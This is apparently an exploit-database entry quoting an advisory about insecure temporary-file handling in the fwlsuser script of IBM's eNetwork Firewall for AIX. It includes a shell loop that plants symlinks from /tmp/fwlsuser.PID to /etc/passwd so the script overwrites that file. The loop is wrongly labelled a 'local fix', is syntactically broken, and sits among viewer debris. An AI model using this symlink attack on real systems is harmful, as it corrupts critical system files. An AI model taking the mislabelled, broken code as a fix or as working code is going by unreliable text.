14 lines
No EOL
605 B
Text
Executable file
14 lines
No EOL
605 B
Text
Executable file
soure: http://www.securityfocus.com/bid/287/info
|
|
|
|
IBM's eNetwork Firewall for AIX contains a number of vulnerability in scripts which manipulate files insecurely. When fwlsuser script is run it creates a temporary file called /tmp/fwlsuser.PID ( where PID is the process ID of the command being run ). If this file is created previously and is a link to any other file the output generated by the fwlsuser script will overwrite this linked file.
|
|
|
|
x = 5000
|
|
while true
|
|
|
|
LOCAL FIX AS REPORTED BY ORIGINATOR:
|
|
ln -s /etc/passwd /tmp/fwlsuser.$x
|
|
# rm /tmp/fwlsuser.$x
|
|
let x=$x+1
|
|
echo $x
|
|
done
|
|
exit |